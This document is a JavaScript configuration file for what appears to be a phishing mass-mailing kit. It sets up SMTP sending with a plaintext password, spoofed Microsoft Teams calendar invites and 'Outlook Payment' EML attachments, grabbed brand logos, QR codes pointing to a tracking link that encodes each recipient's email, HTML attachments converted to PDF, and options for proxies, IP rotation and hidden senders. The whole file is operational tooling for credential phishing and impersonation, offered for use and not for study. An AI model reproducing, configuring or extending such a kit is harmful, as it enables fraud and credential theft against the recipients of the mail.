#!/usr/bin/env node
const smtp = [
  {
    "host": "smtp.seznam.cz",
    "port": 25,
    "secure": false,
    "username": "noreply-BM7dxKrSfiaeuD1@seznam.cz",
    "password": "Spaghetti12345",
    "from_email": "noreply-BM7dxKrSfiaeuD1@seznam.cz",
    "user": "a"
  },                                                                                                                                                                                                                                                                                                                                                                           
]
   // ==== ===
   
let setup ={
   key: 				 "$2y$12$XUpY4cE3TDBqlYzzVa4fE.Ij9klPClybsyGfDGuILMybOzrMMhAB.",
   MultipleSmtp:		 "QUEUE", // "ROTATE" AND "QUEUE" 
   
   mail_priority:		 "high", // high , medium, low
   sleep_time: 			 1500,// 1000 for 1 second (can setup 0)
   isMultiThread:		 false,
   howManyThread:		 1,
   
   mail_subject: 		 "kldj", // email subject
   from_name: 			 'sfhfvhr', 

   multiple_subject:	 false, // email subject
   multi_subject: 		 ["new <TIME>","from <NAME>"],

   multiple_fromName:	 false, // email subject
   multi_FromName:	     ["varo <TIME>"," <NAME> "],

   test_frommail: 		 false,
   frommail_filename:    "frommail.txt",
   hide_frommail:        false, // true, false [NOT ALL SMTP SUPPORT THIS FEATURE]
   
   replyTo: 			 "",
   email_test: 			 false, // true, false
   test_every:			 100,
   email_destination:	 "NOIR@NOIR.COM",
   
   letter: 				 "letter.html",
   encode_letter:        "utf-8", // there are 3 options "hex" "utf-8" and "base64" and 
   
   useAttachment:		 false,
   encode_attachment:	 "", // there are 2 options "" and "base64"
   
   mailist:				 "mailist.txt", // file name mailist
   
   pdfOrientation:		 "portrait", // "portrait" or "landscape" for pdf attachment
   
   LetterToImage:		 false, 
   width_imageLetter: 	 700,
   height_imageLetter:	 1300, //535 for Teams letter //500 for excel letter

   width_imageLetter_2:  700,
   height_imageLetter_2: 1300, //535 for Teams letter //500 for excel letter

   fileName_LetterToImage:  "./letterToImage.html",
   
   useGrabLogo:			 true, // true false
   defaultLogo:			 "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31",
   useMylogo:			 false,
   
   widthImage_for_grabLogo_letter: 		 "",
   heightImage_for_grabLogo_letter: 	 "",
   
   widthImage_for_myLogo_letter: 		 "",
   heightImage_for_myLogo_letter:	     "",
   
   
   widthImage_for_grabLogo_attachment:	 "",
   heighttImage_for_grabLogo_attachment: "", 
   
   widthImage_for_myLogo_attachment:	 "",
   heighttImage_for_myLogo_attachment:	 "", 
   
   proxy: 								 ""
   
   }

  const calendar_invite = {
  active: false,

  TIMEZONE: "Europe/Warsaw",

  SUMMARY: "",
  DESCRIPTION:
    "",

  LOCATION: "<DOMAIN>",
  METHOD: "REQUEST",
  STATUS: "CONFIRMED",
  TRANSP: "OPAQUE",

  ORGANIZER_CN: "Microsoft Teams",
  ORGANIZER_EMAIL: "teams@microsoft.com",
  ATTENDEE_CN: "All Employee",
  ATTENDEE_EMAIL: "HR@<DOMAIN>",
  RSVP: false,

  BUSYSTATUS: "BUSY",
  DISALLOW_COUNTER: true,
  IMPORTANCE: 1,

  REMINDER_MINUTES: 15,
  REMINDER_TEXT:
    "",

  // Example placeholder (time not too important for voicemail)
  START_DATE: "07/11/2025", // DD/MM/YYYY
  START_TIME: "10:30",
  END_DATE: "09/11/2025",
  END_TIME: "10:45",
  DURATION_MINUTES: 15
};
  
   
   
   const myLOGO = [
      {
         function_name:"MYLOGO1",
         nameFile : "https://drive.google.com/uc?export=view&id=1oMBVsQBm4ooCDJHc6JoIk3MNpsufMbQN"
      }
   ]
   
   const generate_QRCODE = {
   activate : true,
   foreground_color : "#000000",
   background_color : "#FFFFFF",
   link : "https://previvale.emlnk.com/lt.php?x=4lZy~GDEJXnNDHCs_NA4UeN03X2pj_Twv-5ik5PHJFad5HF7y0y.xuG-142jmNJfwlYwzLd2I0/#<RANDNUM5><RANDNUM4>Family=<EMAIL64>",
   width: "200",
   height: "200",
   }
   
   const attachment_EML = {
   use_EML: false,
   
   
   attachment_name_EML: "<COMPANYNAME>.eml",
   letter_eml: "attachment_EML.html",
   
   subject_eml: "Outlook Payment <COMPANYNAME>",
   from_email_eml: "support.mail.<COMPANYNAME>.com",
   
   useAttachment_EML: false,
   attachment: [
     {
       attachmentName: "<COMPANYNAME>-(32025).html",
       path: "NOIRLEGACY/EML/attachment.html",
     },
   ],
   };
   
   const attachment = [
 
    {
      filename: "<COMPANYNAME>-1038_XxTEVWvsGLgGXx<RANDSTRING3>WvsG<RANDNUM3>.pdf", // leave it blank if you want to use default name
      path: "attachment.html", // stream this file
      attachmentToPdf: true,
      attachmentToDocx: false,
    },
 
  
  
  ];
  
   
   const redirect_link = {
   useRedirect: false,
   key: "tes1",
   enc_email: "c", 
   }
   
   
   
   const setup_time_date = {
   time_zone           :"America/Adak", //https://en.wikipedia.org/wiki/List_of_tz_database_time_zones -> list all of time zone in the world
   timezone_name       :"short", // "long" and "short"
   time_format_lang    :"en",
   }
   
   //generate your number random 
   const generate_random_number = [
   {
     name:"RANDNUM1",
     lengt_value:1
   },
   {
     name:"RANDNUM2",
     lengt_value:2
   },
   {
     name:"RANDNUM3",
     lengt_value:3
   },
   {
     name:"RANDNUM4",
     lengt_value:4
   },
   {
     name:"RANDNUM5",
     lengt_value:5
   },
   ]
   
   const generate_random_string = [
   {
     name:"random_string_3",
     lengt_value:3,
     type:"UPPERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
   },
   {
     name:"random_string_4",
     lengt_value:4,
     type:"LOWERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
   },
   {
     name:"random_string_20",
     lengt_value:20,
     type:"LOWERCASE" // "UPPERCASE","LOWERCASE","RANDOM"
   },
   ]
   
   const others = {
     change_ip: false,
     requireTLS: false,
     ignoreTLS: false,
     letterImageName: "Thumbnail000.png",
     cid: "JOKDIGLAFGAE",
     cidQR: "JOKDIGLAFGAE2",
     AutoLogin: true,
     qrname: "Thumbnail3473624.png",
     rejectUnauthorized: false,
     attachment_mode: 2,
     fix_icloud: true,
     space_attachment: 1,
     maxMessages: 1,
     maxConnections: 1,
     att_CT: "image/svg+xml",
   }
   const owa = {
    active : false,
    url: ""
  }
  
  // module.exports = {calendar_invite,smtp,setup,owa, generate_random_number, generate_random_string, setup_time_date,attachment,myLOGO, attachment_EML, others, redirect_link, generate_QRCODE};
  
  export {
    calendar_invite,
    smtp,
    setup,
    owa,
    generate_random_number,
    generate_random_string,
    setup_time_date,
    attachment,
    myLOGO,
    attachment_EML,
    others,
    redirect_link,
    generate_QRCODE
};